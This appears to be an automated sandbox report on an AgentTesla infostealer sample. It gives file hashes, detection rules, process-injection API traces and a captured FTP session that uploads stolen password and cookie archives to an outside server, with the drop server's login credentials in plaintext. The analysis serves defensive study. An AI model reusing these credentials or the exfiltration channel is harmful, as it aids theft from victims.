                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.165455898902739
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:umVoLahqZn.exe
                              File size:832'000 bytes
                              MD5:6142aad778dc57ae2ecfe036c2d11c4e
                              SHA1:73d3b45ab4812f445b6cf1c58ea7b7fdf47295a8
                              SHA256:325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67
                              SHA512:5f4fd5212843e106ce21bebcc0776bb8647cd83de9a07e9b50ac6bbec72947b5eb288ba12a19685e9c238bc69ee4b8133fd05e7cf5797b40db2fb0269480ec3b
                              SSDEEP:12288:mB3yuZG8+De1kIse8LRWjrZCollIoNE8kzZu3vvK541rs:mB3yuZGVteKRyjl6ik1Cvvy41rs
                              TLSH:7C05F05903FC9EA0F67E2BB6C5B212044B75B4077872E35D468090FB5E72BE1D992B23
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.B............................N.... ........@.. ....................... ............`................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x4cc94e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x42B065FA [Wed Jun 15 17:31:38 2005 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcc8fc0x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x3f8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xca9540xcaa00d2e3b86491d71694fcb1bf8fc7060021False0.7661081604719309data7.173088295592971IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xce0000x3f80x400936889baeeb8b201b00afcd100017fd7False0.4375data3.4785471698328942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd00000xc0x200ca4b8c4d23f3f280dfa900dc4853fbf3False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xce0580x3a0data0.4482758620689655
                              DLLImport
                              mscoree.dll_CorExeMain
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-05T17:19:03.339168+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549823162.241.203.3021TCP
                              2024-12-05T17:19:04.266946+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549830162.241.203.3049139TCP
                              2024-12-05T17:19:04.387388+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549830162.241.203.3049139TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:18:59.838640928 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:18:59.958595037 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:18:59.959754944 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:01.104043961 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:01.104264021 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:01.224479914 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:01.436093092 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:01.438261032 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:01.558074951 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:01.876823902 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:01.877048969 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:01.996876955 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.210906029 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.211105108 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:02.331249952 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.545950890 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.546293974 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:02.666296959 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.878377914 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:02.878551006 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:03.000718117 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:03.213762999 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:03.215712070 CET4983049139192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:03.266058922 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:03.335434914 CET4913949830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:03.335530043 CET4983049139192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:03.339168072 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:03.459573984 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:04.266601086 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:04.266946077 CET4983049139192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.266997099 CET4983049139192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.312911034 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.386799097 CET4913949830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:04.387288094 CET4913949830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:04.387387991 CET4983049139192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.606192112 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:04.656681061 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.669147968 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:04.789369106 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:05.001497984 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:05.001996040 CET4983549101192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:05.047343016 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:05.122826099 CET4910149835162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:05.122952938 CET4983549101192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:05.123049974 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:05.243083000 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.052539110 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.052753925 CET4983549101192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:06.052753925 CET4983549101192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:06.094165087 CET4982321192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:06.176517963 CET4910149835162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.176543951 CET4910149835162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.176656961 CET4910149835162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.177159071 CET4910149835162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.177208900 CET4983549101192.168.2.5162.241.203.30
                              Dec 5, 2024 17:19:06.389560938 CET2149823162.241.203.30192.168.2.5
                              Dec 5, 2024 17:19:06.437948942 CET4982321192.168.2.5162.241.203.30
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:18:59.686371088 CET5881253192.168.2.51.1.1.1
                              Dec 5, 2024 17:18:59.825875998 CET53588121.1.1.1192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:18:59.686371088 CET192.168.2.51.1.1.10xb932Standard query (0)ftp.aminhacorretora.com.brA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:18:59.825875998 CET1.1.1.1192.168.2.50xb932No error (0)ftp.aminhacorretora.com.braminhacorretora.com.brCNAME (Canonical name)IN (0x0001)false
                              Dec 5, 2024 17:18:59.825875998 CET1.1.1.1192.168.2.50xb932No error (0)aminhacorretora.com.br162.241.203.30A (IP address)IN (0x0001)false
                              TimestampSource PortDest PortSource IPDest IPCommands
                              Dec 5, 2024 17:19:01.104043961 CET2149823162.241.203.30192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:19:01.104264021 CET4982321192.168.2.5162.241.203.30USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:19:01.436093092 CET2149823162.241.203.30192.168.2.5331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:19:01.438261032 CET4982321192.168.2.5162.241.203.30PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:19:01.876823902 CET2149823162.241.203.30192.168.2.5230 OK. Current restricted directory is /
                              Dec 5, 2024 17:19:02.210906029 CET2149823162.241.203.30192.168.2.5504 Unknown command
                              Dec 5, 2024 17:19:02.211105108 CET4982321192.168.2.5162.241.203.30PWD
                              Dec 5, 2024 17:19:02.545950890 CET2149823162.241.203.30192.168.2.5257 "/" is your current location
                              Dec 5, 2024 17:19:02.546293974 CET4982321192.168.2.5162.241.203.30TYPE I
                              Dec 5, 2024 17:19:02.878377914 CET2149823162.241.203.30192.168.2.5200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:19:02.878551006 CET4982321192.168.2.5162.241.203.30PASV
                              Dec 5, 2024 17:19:03.213762999 CET2149823162.241.203.30192.168.2.5227 Entering Passive Mode (162,241,203,30,191,243)
                              Dec 5, 2024 17:19:03.339168072 CET4982321192.168.2.5162.241.203.30STOR PW_user-367706_2024_12_05_11_18_58.html
                              Dec 5, 2024 17:19:04.266601086 CET2149823162.241.203.30192.168.2.5150 Accepted data connection
                              Dec 5, 2024 17:19:04.606192112 CET2149823162.241.203.30192.168.2.5226-File successfully transferred
                              226-File successfully transferred226 0.333 seconds (measured here), 0.94 Kbytes per second
                              Dec 5, 2024 17:19:04.669147968 CET4982321192.168.2.5162.241.203.30PASV
                              Dec 5, 2024 17:19:05.001497984 CET2149823162.241.203.30192.168.2.5227 Entering Passive Mode (162,241,203,30,191,205)
                              Dec 5, 2024 17:19:05.123049974 CET4982321192.168.2.5162.241.203.30STOR CO_user-367706_2024_12_05_11_19_03.zip
                              Dec 5, 2024 17:19:06.052539110 CET2149823162.241.203.30192.168.2.5150 Accepted data connection
                              Dec 5, 2024 17:19:06.389560938 CET2149823162.241.203.30192.168.2.5226-File successfully transferred
                              226-File successfully transferred226 0.337 seconds (measured here), 9.93 Kbytes per second

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:11:17:51
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\umVoLahqZn.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\umVoLahqZn.exe"
                              Imagebase:0x10000
                              File size:832'000 bytes
                              MD5 hash:6142AAD778DC57AE2ECFE036C2D11C4E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:11:18:24
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xfb0000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:17.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:8.1%
                                Total number of Nodes:86
                                Total number of Limit Nodes:7
                                execution_graph 49751 7e2e640 49752 7e2e688 WriteProcessMemory 49751->49752 49754 7e2e6df 49752->49754 49759 7e2f030 49760 7e2f075 Wow64SetThreadContext 49759->49760 49762 7e2f0bd 49760->49762 49770 7e2df00 49771 7e2df40 VirtualAllocEx 49770->49771 49773 7e2df7d 49771->49773 49827 7e2ed90 49828 7e2edd8 VirtualProtectEx 49827->49828 49830 7e2ee16 49828->49830 49831 7cbbe38 49832 7cbbe80 VirtualProtect 49831->49832 49833 7cbbeba 49832->49833 49774 13f1ad8 CloseHandle 49775 13f1b3f 49774->49775 49733 7e26e78 49734 7e26e53 49733->49734 49738 7e26e7e 49733->49738 49735 7e272e9 49738->49735 49739 7e298d0 49738->49739 49743 7e293c8 49738->49743 49741 7e298f7 49739->49741 49740 7e29ab1 49740->49738 49741->49740 49747 7e2bc58 49741->49747 49744 7e293d6 49743->49744 49745 7e293dd 49743->49745 49744->49738 49745->49744 49746 7e2bc58 CreateProcessAsUserW 49745->49746 49746->49745 49748 7e2bcd7 CreateProcessAsUserW 49747->49748 49750 7e2bdd8 49748->49750 49763 7e2f4b8 49764 7e2f643 49763->49764 49766 7e2f4de 49763->49766 49766->49764 49767 7e2e138 49766->49767 49768 7e2f738 PostMessageW 49767->49768 49769 7e2f7a4 49768->49769 49769->49766 49834 7e2f298 49835 7e2f2d8 ResumeThread 49834->49835 49837 7e2f309 49835->49837 49838 7e2d818 49839 7e2d85d Wow64GetThreadContext 49838->49839 49841 7e2d8a5 49839->49841 49755 7c3c5f8 49756 7c3c63e DeleteFileW 49755->49756 49758 7c3c677 49756->49758 49776 7cbada0 49777 7cbadb4 49776->49777 49778 7cbae2d 49777->49778 49787 7e22e00 49777->49787 49791 7e2377d 49777->49791 49795 7e22c9d 49777->49795 49799 7e235ec 49777->49799 49803 7e22aeb 49777->49803 49807 7e24527 49777->49807 49811 7e23597 49777->49811 49815 7e22da1 49777->49815 49820 7e24a40 49787->49820 49824 7e24a48 49787->49824 49788 7e22e13 49793 7e24a40 VirtualProtect 49791->49793 49794 7e24a48 VirtualProtect 49791->49794 49792 7e23797 49793->49792 49794->49792 49797 7e24a40 VirtualProtect 49795->49797 49798 7e24a48 VirtualProtect 49795->49798 49796 7e22cc1 49797->49796 49798->49796 49801 7e24a40 VirtualProtect 49799->49801 49802 7e24a48 VirtualProtect 49799->49802 49800 7e2362a 49801->49800 49802->49800 49805 7e24a40 VirtualProtect 49803->49805 49806 7e24a48 VirtualProtect 49803->49806 49804 7e22afc 49805->49804 49806->49804 49809 7e24a40 VirtualProtect 49807->49809 49810 7e24a48 VirtualProtect 49807->49810 49808 7e24538 49809->49808 49810->49808 49813 7e24a40 VirtualProtect 49811->49813 49814 7e24a48 VirtualProtect 49811->49814 49812 7e235ab 49813->49812 49814->49812 49816 7e22d96 49815->49816 49816->49815 49817 7e22e13 49816->49817 49818 7e24a40 VirtualProtect 49816->49818 49819 7e24a48 VirtualProtect 49816->49819 49818->49817 49819->49817 49821 7e24a48 VirtualProtect 49820->49821 49823 7e24aca 49821->49823 49823->49788 49825 7e24a90 VirtualProtect 49824->49825 49826 7e24aca 49825->49826 49826->49788

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 142 7c306e0-7c306ff 143 7c30705-7c3070b 142->143 144 7c308ad-7c308fe 142->144 145 7c3070d-7c30714 143->145 146 7c3074c-7c30760 143->146 170 7c30900-7c3090d 144->170 171 7c30918-7c30932 144->171 150 7c30716-7c30723 145->150 151 7c3072e-7c30747 call 7c30074 145->151 147 7c30782-7c3078b 146->147 148 7c30762-7c30766 146->148 153 7c307a5-7c307c1 147->153 154 7c3078d-7c3079a 147->154 148->147 152 7c30768-7c30774 148->152 150->151 151->146 152->147 162 7c30776-7c3077c 152->162 166 7c307c7-7c307d2 153->166 167 7c30869-7c3088d 153->167 154->153 162->147 174 7c307d4-7c307da 166->174 175 7c307ea-7c307f1 166->175 177 7c30897 167->177 178 7c3088f 167->178 170->171 184 7c30934-7c3093b 171->184 185 7c30979-7c30980 171->185 180 7c307de-7c307e0 174->180 181 7c307dc 174->181 182 7c307f3-7c307fd 175->182 183 7c30805-7c30828 175->183 177->144 178->177 180->175 181->175 182->183 192 7c3082a-7c30837 183->192 193 7c30839-7c3084a 183->193 190 7c30955-7c3096a 184->190 191 7c3093d-7c3094a 184->191 187 7c30982-7c3098f 185->187 188 7c3099a-7c309a3 185->188 187->188 194 7c309a5-7c309a7 188->194 195 7c309a9-7c309ac 188->195 190->185 200 7c3096c-7c30973 190->200 191->190 192->193 204 7c30857-7c30863 192->204 193->204 205 7c3084c-7c3084f 193->205 198 7c309ad-7c309b1 194->198 195->198 206 7c309b9-7c309be 198->206 200->185 203 7c30a07-7c30a32 200->203 217 7c30a39-7c30a9a 203->217 204->166 204->167 205->204 207 7c30a01-7c30a04 206->207 208 7c309c0-7c309c7 206->208 211 7c309e1-7c309f6 208->211 212 7c309c9-7c309d6 208->212 211->207 216 7c309f8-7c309ff 211->216 212->211 216->207 216->217 225 7c30ab2-7c30ab8 217->225 226 7c30a9c-7c30aaf 217->226 227 7c30aba-7c30ac1 225->227 228 7c30b28-7c30b80 225->228 229 7c30b87-7c30bdf 227->229 230 7c30ac7-7c30ad7 227->230 228->229 235 7c30be6-7c30cc8 229->235 230->235 236 7c30add-7c30ae1 230->236 278 7c30cca-7c30cf4 235->278 279 7c30d48-7c30d9e 235->279 239 7c30ae4-7c30ae6 236->239 242 7c30b0b-7c30b0d 239->242 243 7c30ae8-7c30af8 239->243 245 7c30b0f-7c30b19 242->245 246 7c30b1c-7c30b25 242->246 251 7c30ae3 243->251 252 7c30afa-7c30b09 243->252 251->239 252->242 252->251 280 7c30d46 278->280 281 7c30cf6-7c30d06 278->281 285 7c30da5-7c30e91 279->285 280->279 281->285 286 7c30d0c-7c30d10 281->286 319 7c30e93-7c30eb2 285->319 320 7c30ee4-7c30eed 285->320 287 7c30d13-7c30d15 286->287 288 7c30d17-7c30d27 287->288 289 7c30d29-7c30d2b 287->289 288->289 297 7c30d12 288->297 292 7c30d3a-7c30d43 289->292 293 7c30d2d-7c30d37 289->293 297->287 321 7c30eb4-7c30ec7 319->321 322 7c30eca-7c30ed0 319->322 323 7c30ef0-7c30efd 320->323 324 7c30ed2-7c30ed9 322->324 325 7c30f4a-7c30fa2 322->325 332 7c30f22-7c30f2f 323->332 333 7c30eff-7c30f0f 323->333 327 7c30fa9-7c31001 324->327 328 7c30edf-7c30ee3 324->328 325->327 330 7c31008-7c310ee 327->330 328->320 328->330 341 7c30f31-7c30f3b 332->341 342 7c30f3e-7c30f47 332->342 339 7c30f11-7c30f20 333->339 340 7c30eef 333->340 339->332 339->340 340->323
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq$Haq$Haq$Haq$Haq$Haq$PH]q
                                • API String ID: 0-1308128955
                                • Opcode ID: 39cb9ce3299b22c31d268d4cafa3111eb1f16dd9743339fa52ed77892259b46b
                                • Instruction ID: b129c03d9bb8b43884092758eeddccccd4e5cd3cfab0c1f13e9ad73fa04856c1
                                • Opcode Fuzzy Hash: 39cb9ce3299b22c31d268d4cafa3111eb1f16dd9743339fa52ed77892259b46b
                                • Instruction Fuzzy Hash: 1552DD717002158FCB58AF39C894A6E7BA7BF89310F1485A9E406DB3A5CF34DD46C7A1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 465 7cb401e-7cb40cc 468 7cb40d2-7cb41cc 465->468 469 7cb41d4-7cb41d6 465->469 468->469 470 7cb41d8-7cb41db 469->470 471 7cb41dd-7cb41ed 469->471 472 7cb421b-7cb565a 470->472 475 7cb41ef-7cb4200 471->475 476 7cb4202-7cb4218 471->476 734 7cb730b-7cb7366 472->734 735 7cb5660-7cb56e8 472->735 475->472 476->472 741 7cb73a8-7cb73ef 734->741 742 7cb7368-7cb73a6 734->742 1068 7cb56ee call 7cb82a0 735->1068 1069 7cb56ee call 7cb82b0 735->1069 745 7cb73f0-7cb741d 741->745 742->741 748 7cb741f-7cb7454 745->748 750 7cb7456-7cb7459 748->750 751 7cb7484-7cb7498 748->751 753 7cb745b-7cb7470 750->753 754 7cb7474-7cb7482 750->754 755 7cb749a-7cb749e 751->755 756 7cb74f5-7cb7528 751->756 753->754 754->751 758 7cb56f1-7cb58e4 782 7cb58ea-7cb59d9 758->782 783 7cb59de-7cb5acc 758->783 804 7cb5acf-7cb6f9f 782->804 783->804 804->734 1068->758 1069->758
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$G
                                • API String ID: 0-3628805992
                                • Opcode ID: f078da427ce5408eb9c23271af7a6243bdf3a4aedb377292a935bdfbec8c3ffc
                                • Instruction ID: 293bee86b3e876d9a2041934d9de8f820f8fc830ad324cf0bdd2d8b737a09489
                                • Opcode Fuzzy Hash: f078da427ce5408eb9c23271af7a6243bdf3a4aedb377292a935bdfbec8c3ffc
                                • Instruction Fuzzy Hash: 60538DB0E152698BCB24EF78DC8976DBBB5EB89304F4044EAD448B7240DE386D85CF56

                                Control-flow Graph

                                • Executed
                                • Not Executed
